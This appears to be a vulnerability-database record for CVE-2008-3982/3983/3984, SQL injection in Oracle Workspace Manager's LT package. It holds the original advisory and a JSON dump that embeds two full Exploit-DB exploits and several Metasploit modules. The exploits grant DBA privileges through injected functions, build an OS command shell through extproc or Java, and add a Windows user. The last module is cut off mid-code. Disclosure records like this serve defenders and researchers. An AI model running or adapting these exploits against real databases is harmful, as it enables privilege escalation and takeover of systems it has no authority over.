Team SHATTER Security Advisory: Oracle Database multiple SQL Injection vulnerabilities in Workspace Manager
2008-11-14T00:00:00
ID SECURITYVULNS:DOC:20859 Type securityvulns Reporter Securityvulns Modified 2008-11-14T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Team SHATTER Security Advisory
Oracle Database multiple SQL Injection vulnerabilities in Workspace
Manager
November 12, 2008
Risk Level:
High
Affected versions:
Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1
Remote exploitable:
Yes (Authentication required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides the "LT" PL/SQL package that is part of the
Oracle Workspace Manager component. This package has multiple
instances of SQL Injection in COMPRESSWORKSPACETREE, MERGEWORKSPACE
and REMOVEWORKSPACE procedures. Dependening on what Oracle Workspace
Manager release is installed, this PL/SQL package is owned by SYS (on
older releses) or by WMSYS (on newer releases). A malicious user can
call the vulnerable procedures of this package with specially crafted
parameters and execute SQL statements with the elevated privileges of
the package owner, depending on the system configuration it can be SYS
or WMSYS.
Impact:
By default [WM]SYS.LT has EXECUTE permission to PUBLIC so any Oracle
Database user can exploit this vulnerability. Exploitation of this
vulnerability allows an attacker to execute SQL commands with SYS or
WMSYS privileges.
Vendor Status:
Vendor was contacted and a patch was released.
Workaround:
Restrict access to the [WM]SYS.LT package.
Fix:
Apply Oracle Critical Patch Update October 2008 available at Oracle
Metalink.
Application Security, Inc's database security solutions have helped
over 1000 organizations secure their databases from all internal and
external threats while also ensuring that those organizations meet or
exceed regulatory compliance and audit requirements.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
{"id": "SECURITYVULNS:DOC:20859", "bulletinFamily": "software", "title": "Team SHATTER Security Advisory: Oracle Database multiple SQL Injection vulnerabilities in Workspace Manager", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nTeam SHATTER Security Advisory\r\n\r\nOracle Database multiple SQL Injection vulnerabilities in Workspace\r\nManager\r\n\r\nNovember 12, 2008\r\n\r\nRisk Level:\r\nHigh\r\n\r\nAffected versions:\r\nOracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1\r\n\r\nRemote exploitable:\r\nYes (Authentication required)\r\n\r\nCredits:\r\nThis vulnerability was discovered and researched by Esteban Martinez\r\nFayo of Application Security Inc.\r\n\r\nDetails:\r\nOracle Database provides the "LT" PL/SQL package that is part of the\r\nOracle Workspace Manager component. This package has multiple\r\ninstances of SQL Injection in COMPRESSWORKSPACETREE, MERGEWORKSPACE\r\nand REMOVEWORKSPACE procedures. Dependening on what Oracle Workspace\r\nManager release is installed, this PL/SQL package is owned by SYS (on\r\nolder releses) or by WMSYS (on newer releases). A malicious user can\r\ncall the vulnerable procedures of this package with specially crafted\r\nparameters and execute SQL statements with the elevated privileges of\r\nthe package owner, depending on the system configuration it can be SYS\r\nor WMSYS.\r\n\r\nImpact:\r\nBy default [WM]SYS.LT has EXECUTE permission to PUBLIC so any Oracle\r\nDatabase user can exploit this vulnerability. Exploitation of this\r\nvulnerability allows an attacker to execute SQL commands with SYS or\r\nWMSYS privileges.\r\n\r\nVendor Status:\r\nVendor was contacted and a patch was released.\r\n\r\nWorkaround:\r\nRestrict access to the [WM]SYS.LT package.\r\n\r\nFix:\r\nApply Oracle Critical Patch Update October 2008 available at Oracle\r\nMetalink.\r\n\r\nCVE:\r\nCVE-2008-3982, CVE-2008-3983, CVE-2008-3984\r\n\r\nReferences:\r\nhttp://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml\r\n\r\nTimeline:\r\nVendor Notification - 8/22/2007\r\nVendor Response - 8/23/2007\r\nFix - 10/14/2008\r\nPublic Disclosure - 11/11/2008\r\n\r\nApplication Security, Inc's database security solutions have helped\r\nover 1000 organizations secure their databases from all internal and\r\nexternal threats while also ensuring that those organizations meet or\r\nexceed regulatory compliance and audit requirements.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information.\r\nUse of the information constitutes acceptance for use in an AS IS\r\ncondition. There are no warranties with regard to this information.\r\nNeither the author nor the publisher accepts any liability for any\r\ndirect, indirect, or consequential loss or damage arising from use of,\r\nor reliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n \r\niD8DBQFJG65x9EOAcmTuFN0RAocIAKC77C08mVDcr+vlW72ZouthG331pgCfdiWh\r\nB4vxa6p3bnqn/RSLHWKkmHk=\r\n=5OHE\r\n-----END PGP SIGNATURE-----", "published": "2008-11-14T00:00:00", "modified": "2008-11-14T00:00:00", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20859", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2008-3982", "CVE-2008-3983", "CVE-2008-3984"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:28", "edition": 1, "viewCount": 6, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-08-31T11:10:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3982", "CVE-2008-3984", "CVE-2008-3983"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9382"]}, {"type": "exploitdb", "idList": ["EDB-ID:7676", "EDB-ID:7675"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SQLI/ORACLE/LT_COMPRESSWORKSPACE", "MSF:AUXILIARY/SQLI/ORACLE/LT_REMOVEWORKSPACE", "MSF:AUXILIARY/SQLI/ORACLE/LT_MERGEWORKSPACE"]}, {"type": "nessus", "idList": ["ORACLE_RDBMS_CPU_OCT_2008.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2008-100299"]}, {"type": "seebug", "idList": ["SSV:4264"]}], "modified": "2018-08-31T11:10:28", "rev": 2}, "vulnersScore": 7.3}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T05:35:16", "description": "Unspecified vulnerability in the Workspace Manager component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3, and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity, related to SYS.LT and WMSYS.LT, a different vulnerability than CVE-2008-3982 and CVE-2008-3983.", "edition": 4, "cvss3": {}, "published": "2008-10-14T21:11:00", "title": "CVE-2008-3984", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3984"], "modified": "2017-08-08T01:32:00", "cpe": ["cpe:/a:oracle:database_9i:9.2.0.8", "cpe:/a:oracle:database_9i:9.2.0.8dv", "cpe:/a:oracle:database_11i:11.1.0.6", "cpe:/a:oracle:database_10g:10.2.0.3", "cpe:/a:oracle:database_10g:10.1.0.5"], "id": "CVE-2008-3984", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3984", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:database_11i:11.1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8dv:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.0.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:16", "description": "Unspecified vulnerability in the Workspace Manager component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3, and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity, related to SYS.LT and WMSYS.LT, a different vulnerability than CVE-2008-3982 and CVE-2008-3984.", "edition": 4, "cvss3": {}, "published": "2008-10-14T21:11:00", "title": "CVE-2008-3983", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3983"], "modified": "2017-08-08T01:32:00", "cpe": ["cpe:/a:oracle:database_9i:9.2.0.8", "cpe:/a:oracle:database_9i:9.2.0.8dv", "cpe:/a:oracle:database_11i:11.1.0.6", "cpe:/a:oracle:database_10g:10.2.0.3", "cpe:/a:oracle:database_10g:10.1.0.5"], "id": "CVE-2008-3983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3983", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:database_11i:11.1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8dv:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.0.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:16", "description": "Unspecified vulnerability in the Workspace Manager component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3, and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity, related to SYS.LT and WMSYS.LT, a different vulnerability than CVE-2008-3983 and CVE-2008-3984.", "edition": 4, "cvss3": {}, "published": "2008-10-14T21:11:00", "title": "CVE-2008-3982", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3982"], "modified": "2017-08-08T01:32:00", "cpe": ["cpe:/a:oracle:database_9i:9.2.0.8", "cpe:/a:oracle:database_9i:9.2.0.8dv", "cpe:/a:oracle:database_11i:11.1.0.6", "cpe:/a:oracle:database_10g:10.2.0.3", "cpe:/a:oracle:database_10g:10.1.0.5"], "id": "CVE-2008-3982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3982", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:database_11i:11.1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_9i:9.2.0.8dv:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.0.5:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-3982", "CVE-2008-4000", "CVE-2008-2625", "CVE-2008-3983", "CVE-2008-3996", "CVE-2008-3984", "CVE-2008-3995", "CVE-2008-3994"], "description": "New quarterly updated fixes different types of security vulnerabilities.", "edition": 1, "modified": "2008-11-14T00:00:00", "published": "2008-11-14T00:00:00", "id": "SECURITYVULNS:VULN:9382", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9382", "title": "Oracle multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T02:45:31", "description": "Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit. CVE-2008-3984. Local exploits for multiple platform", "published": "2009-01-06T00:00:00", "type": "exploitdb", "title": "Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3984"], "modified": "2009-01-06T00:00:00", "id": "EDB-ID:7675", "href": "https://www.exploit-db.com/exploits/7675/", "sourceData": "/*********************************************************/\n/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/\n/****grant DBA and create new OS user (advanced extproc)*/\n/*********************************************************/\n/***********exploit grant DBA to scott********************/\n/***********and execute OS command \"net user\"*************/\n/***********using advanced extproc method*****************/\n/*********************************************************/\n/***********tested on oracle 10.1.0.5.0*******************/\n/*********************************************************/\n/*********************************************************/\n/* Date of Public EXPLOIT: January 6, 2009 */\n/* Written by: Alexandr \"Sh2kerr\" Polyakov */\n/* email: Alexandr.Polyakov@dsec.ru */\n/* site: http://www.dsecrg.ru */\n/*\t\t\t http://www.dsec.ru */\n/*********************************************************/\n/*Original Advisory: */\n/*Esteban Martinez Fayo [Team SHATTER ] */\n/*Date of Public Advisory: November 11, 2008 */\n/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/\n/*********************************************************/\n\n\nselect * from user_role_privs;\n\nCREATE OR REPLACE FUNCTION X return varchar2\nauthid current_user as\npragma autonomous_transaction;\nBEGIN\nEXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';\nEXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT';\nEXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT';\nEXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT';\nCOMMIT;\nRETURN 'X';\nEND;\n/\n\nexec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');\nexec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');\n\n/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\\BIN */\n/* this method works in 10g and 11g database versions with updates */\n\nCREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\\Windows\\system32';\nCREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\\Oracle\\product\\10.1.0\\db_1\\BIN';\n\nBEGIN\n SYS.DBMS_FILE_TRANSFER.COPY_FILE(\n source_directory_object => 'copy_dll_from',\n source_file_name => 'msvcrt.dll',\n destination_directory_object => 'copy_dll_to',\n destination_file_name => 'msvcrt.dll');\nEND;\n/\n\nCREATE OR REPLACE LIBRARY extproc_shell AS 'C:\\Oracle\\product\\10.1.0\\db_1\\bin\\msvcrt.dll';\n/\n\nCREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR)\nIS EXTERNAL\nNAME \"system\"\nLIBRARY extproc_shell\nLANGUAGE C;\n/\n\n/* here we can paste any OS command for example create new user */\n\nEXEC extprocexec('net user hack 12345 /add');\n/\n\nselect * from user_role_privs;\n\n// milw0rm.com [2009-01-06]\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7675/"}, {"lastseen": "2016-02-01T02:45:38", "description": "Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit. CVE-2008-3983. Local exploits for multiple platform", "published": "2009-01-06T00:00:00", "type": "exploitdb", "title": "Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3983"], "modified": "2009-01-06T00:00:00", "id": "EDB-ID:7676", "href": "https://www.exploit-db.com/exploits/7676/", "sourceData": "/*********************************************************/\n/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/\n/****grant DBA and create new OS user (java)*************/\n/*********************************************************/\n/***********exploit grant DBA to scott********************/\n/***********and execute OS command \"net user\"*************/\n/***********using java procedures ************************/\n/*********************************************************/\n/***********tested on oracle 10.1.0.5.0*******************/\n/*********************************************************/\n/*********************************************************/\n/* Date of Public EXPLOIT: January 6, 2009 */\n/* Written by: Alexandr \"Sh2kerr\" Polyakov */\n/* email: Alexandr.Polyakov@dsec.ru */\n/* site: http://www.dsecrg.ru */\n/* http://www.dsec.ru */\n/*********************************************************/\n/*Original Advisory: */\n/*Esteban Martinez Fayo [Team SHATTER ] */\n/*Date of Public Advisory: November 11, 2008 */\n/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/\n/*********************************************************/\n\nselect * from user_role_privs;\n\nCREATE OR REPLACE FUNCTION Y return varchar2\nauthid current_user as\npragma autonomous_transaction;\nBEGIN\nEXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';\nCOMMIT;\nRETURN 'Y';\nEND;\n/\n\nexec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y');\nexec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y');\n\n\n\n/* Creating simple java procedure that executes OS */\n\nexec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');\nexec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');\nexec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');\n\nCREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED \"JAVACMD\" AS\nimport java.lang.*;\nimport java.io.*;\npublic class JAVACMD\n{\n public static void execCommand (String command) throws IOException\n {\n Runtime.getRuntime().exec(command);\n }\n};\n/\n\nCREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2)\nAS LANGUAGE JAVA \nNAME 'JAVACMD.execCommand (java.lang.String)';\n/\n\n/* here we can paste any OS command for example create new user */\n\nexec javaexec(\u00c2\u2018net user hack 12345 /add\u00c2\u2019);\n\nselect * from user_role_privs;\n\n// milw0rm.com [2009-01-06]\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7676/"}], "metasploit": [{"lastseen": "2020-06-12T01:14:00", "description": "This module exploits a sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.\n", "published": "2009-07-28T13:43:37", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3984"], "modified": "2017-08-29T00:17:58", "id": "MSF:AUXILIARY/SQLI/ORACLE/LT_REMOVEWORKSPACE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',\n 'Description' => %q{\n This module exploits a sql injection flaw in the REMOVEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.\n },\n 'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-3984' ],\n [ 'OSVDB', '49326']\n ],\n 'DisclosureDate' => 'Oct 13 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execte.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n cruft = Rex::Text.rand_text_alpha_upper(1)\n\n function = \"\n CREATE OR REPLACE FUNCTION #{cruft}\n RETURN VARCHAR2 AUTHID CURRENT_USER\n AS\n PRAGMA AUTONOMOUS_TRANSACTION;\n BEGIN\n EXECUTE IMMEDIATE '#{datastore['SQL']}';\n COMMIT;\n RETURN '#{cruft}';\n END;\"\n\n package1 = %Q|\n BEGIN\n SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n package2 = %Q|\n BEGIN\n SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n uno = Rex::Text.encode_base64(function)\n dos = Rex::Text.encode_base64(package1)\n tres = Rex::Text.encode_base64(package2)\n\n sql = %Q|\n DECLARE\n #{rand1} VARCHAR2(32767);\n #{rand2} VARCHAR2(32767);\n #{rand3} VARCHAR2(32767);\n BEGIN\n #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));\n EXECUTE IMMEDIATE #{rand1};\n #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));\n EXECUTE IMMEDIATE #{rand2};\n #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));\n EXECUTE IMMEDIATE #{rand3};\n END;\n |\n\n clean = \"DROP FUNCTION #{cruft}\"\n\n # Try first, if it's good.. keep doing the dance.\n print_status(\"Attempting sql injection on SYS.LT.REMOVEWORKSPACE...\")\n begin\n prepare_exec(sql)\n rescue => e\n return\n end\n\n print_status(\"Removing function '#{cruft}'...\")\n prepare_exec(clean)\n\n end\nend\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/lt_removeworkspace.rb"}, {"lastseen": "2020-08-27T02:51:23", "description": "This module exploits a sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.\n", "published": "2009-07-28T13:43:37", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3983"], "modified": "2017-08-29T00:17:58", "id": "MSF:AUXILIARY/SQLI/ORACLE/LT_MERGEWORKSPACE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',\n 'Description' => %q{\n This module exploits a sql injection flaw in the MERGEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.\n },\n 'Author' => [ 'CG' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-3983'],\n [ 'OSVDB', '49325'],\n [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],\n [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]\n\n ],\n 'DisclosureDate' => 'Oct 22 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execte.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n cruft = Rex::Text.rand_text_alpha_upper(1)\n\n function = \"\n CREATE OR REPLACE FUNCTION #{cruft}\n RETURN VARCHAR2 AUTHID CURRENT_USER\n AS\n PRAGMA AUTONOMOUS_TRANSACTION;\n BEGIN\n EXECUTE IMMEDIATE '#{datastore['SQL']}';\n COMMIT;\n RETURN '#{cruft}';\n END;\"\n\n package1 = %Q|\n BEGIN\n SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n package2 = %Q|\n BEGIN\n SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n uno = Rex::Text.encode_base64(function)\n dos = Rex::Text.encode_base64(package1)\n tres = Rex::Text.encode_base64(package2)\n\n sql = %Q|\n DECLARE\n #{rand1} VARCHAR2(32767);\n #{rand2} VARCHAR2(32767);\n #{rand3} VARCHAR2(32767);\n BEGIN\n #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));\n EXECUTE IMMEDIATE #{rand1};\n #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));\n EXECUTE IMMEDIATE #{rand2};\n #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));\n EXECUTE IMMEDIATE #{rand3};\n END;\n |\n\n clean = \"DROP FUNCTION #{cruft}\"\n\n # Try first, if it's good.. keep doing the dance.\n print_status(\"Attempting sql injection on SYS.LT.MERGEWORKSPACE...\")\n begin\n prepare_exec(sql)\n rescue => e\n return\n end\n\n print_status(\"Removing function '#{cruft}'...\")\n prepare_exec(clean)\n\n end\nend\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb"}, {"lastseen": "2020-03-10T16:44:37", "description": "This module exploits an sql injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.\n", "published": "2009-07-28T13:43:37", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3982"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SQLI/ORACLE/LT_COMPRESSWORKSPACE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',\n 'Description' => %q{\n This module exploits an sql injection flaw in the COMPRESSWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.\n },\n 'Author' => [ 'CG' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-3982'],\n [ 'OSVDB', '49324'],\n [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]\n ],\n 'DisclosureDate' => 'Oct 13 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execte.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n cruft = Rex::Text.rand_text_alpha_upper(1)\n\n function = \"\n CREATE OR REPLACE FUNCTION #{cruft}\n RETURN VARCHAR2 AUTHID CURRENT_USER\n AS\n PRAGMA AUTONOMOUS_TRANSACTION;\n BEGIN\n EXECUTE IMMEDIATE '#{datastore['SQL']}';\n COMMIT;\n RETURN '#{cruft}';\n END;\"\n\n package1 = \"BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;\"\n\n package2 = \"BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;\"\n\n clean = \"DROP FUNCTION #{cruft}\"\n\n print_status(\"Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...\")\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n prepare_exec(package1)\n 